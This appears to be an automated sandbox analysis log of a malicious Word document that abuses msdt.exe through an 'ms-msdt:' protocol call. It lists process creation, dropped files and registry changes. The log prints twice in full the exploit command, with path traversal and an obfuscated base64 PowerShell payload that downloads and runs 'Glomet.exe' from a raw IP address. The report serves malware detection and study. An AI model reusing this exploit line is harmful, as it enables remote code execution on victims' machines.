Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Section loaded: sfc.dll Jump to behavior
Source: libmpdec-2.dll.29.dr Static PE information: Number of sections : 11 > 10
Source: 20220714 DWG.doc Virustotal: Detection: 8%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP"
Source: unknown Process created: C:\ProgramData\Glomet.exe "C:\programdata\Glomet.exe"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP"
Source: C:\ProgramData\Glomet.exe Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP" Jump to behavior
Source: C:\ProgramData\Glomet.exe Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32 Jump to behavior
Source: 20220714 DWG.doc.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\20220714 DWG.doc
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 29_2_004033B3
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{3A2858FD-E981-4180-86E7-4C2D0F3F33EC} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal72.expl.winDOC@20/52@0/2
Source: C:\ProgramData\Glomet.exe Code function: 29_2_00402173 CoCreateInstance,MultiByteToWideChar, 29_2_00402173
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\ProgramData\Glomet.exe Code function: 29_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 29_2_00404766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\ProgramData\Glomet.exe Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Gratinr\Wr242\Boomerangernes\Hypercenosis Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.29.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.29.dr

Data Obfuscation

barindex
Source: C:\ProgramData\Glomet.exe Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"
Source: C:\ProgramData\Glomet.exe Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75" Jump to behavior
Source: libmpdec-2.dll.29.dr Static PE information: section name: .xdata
Source: api-ms-win-core-timezone-l1-1-0.dll.29.dr Static PE information: 0xFC0D7D83 [Wed Jan 2 18:42:11 2104 UTC]
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\DiagPackage.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\en-US\DiagPackage.dll.mui Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\DiagPackage.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\en-US\DiagPackage.dll.mui Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
